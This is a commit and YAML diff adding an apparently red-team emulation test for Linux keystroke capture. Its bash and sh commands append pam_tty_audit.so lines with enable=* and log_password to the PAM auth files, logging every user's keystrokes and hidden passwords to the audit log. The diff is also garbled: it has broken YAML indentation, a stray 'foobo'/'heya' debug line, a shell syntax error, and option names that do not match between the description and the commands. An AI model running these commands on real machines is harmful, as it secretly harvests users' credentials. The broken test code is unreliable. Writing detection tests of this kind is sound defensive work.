Added new test, test 2 "Living off the land Terminal Input Capture on Linux with pam.d"

Added for both bash and sh, including cleanup and prereq.  might be useful to add get_prereq later, that would make it more noisy and not truly 'living off the land', then.

atomics/T1056.001/T1056.001.yaml

@@ -23,4 +23,53 @@ atomic_tests:
     cleanup_command: |
       Remove-Item $env:TEMP\key.log -ErrorAction Ignore
     name: powershell
-    elevation_required: true
+    elevation_required: true
+    - name: Living off the land Terminal Input Capture on Linux with pam.d
+  description: |
+    Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log.  
+
+    Passwords hidden by the console can also be logged, with 'log_passwd' as in this example.  If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
+   
+    Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary.  Mac OS does not currently contain the pam_tty_audit.so library. 
+  prereq_command: |
+    if [-f /usr/lib/pam/pam_tty_audit.so ]; then exit 0; else exit 1; fi
+  - linux
+  executor:
+    command: |
+      if [ -f /etc/pam.d/password-auth ]; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
+      if [ -f /etc/pam.d/system-auth ]; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
+      sudo touch /tmp/password-auth.bk
+      sudo touch /tmp/system-auth.bk
+      sudo echo "session    required    pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
+      sudo echo "session    required    pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
+      sudo pam-auth-update --package --force
+    cleanup_command: |
+      sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth
+      sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth
+    name: bash
+    elevation_required: true
+        - name: Living off the land Terminal Input Capture on Linux with pam.d
+  description: |
+    Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log.  
+
+    Passwords hidden by the console can also be logged, with 'log_passwd' as in this example.  If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
+   
+    Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary.  Mac OS does not currently contain the pam_tty_audit.so library. 
+  prereq_command: |
+    if test -f /usr/lib/pam/pam_tty_audit.so; then exit 0; else exit 1; fi
+  - linux
+  executor:
+    command: |if test -f "foobo"; then echo "heya"; else "nope";fi
+heya
+      if test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
+      if test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
+      sudo touch /tmp/password-auth.bk
+      sudo touch /tmp/system-auth.bk
+      sudo echo "session    required    pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
+      sudo echo "session    required    pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
+      sudo pam-auth-update --package --force
+    cleanup_command: |
+      sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth
+      sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth
+    name: sh
+    elevation_required: true